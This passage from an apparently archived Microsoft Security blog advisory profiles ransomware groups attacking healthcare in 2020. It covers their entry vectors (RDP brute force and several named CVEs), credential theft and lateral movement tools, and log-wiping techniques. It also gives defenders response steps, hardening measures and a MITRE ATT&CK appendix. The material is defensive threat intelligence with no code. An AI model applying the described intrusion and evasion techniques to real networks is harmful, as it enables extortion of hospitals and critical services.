(MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "modified": "2020-04-28T16:00:49", "published": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}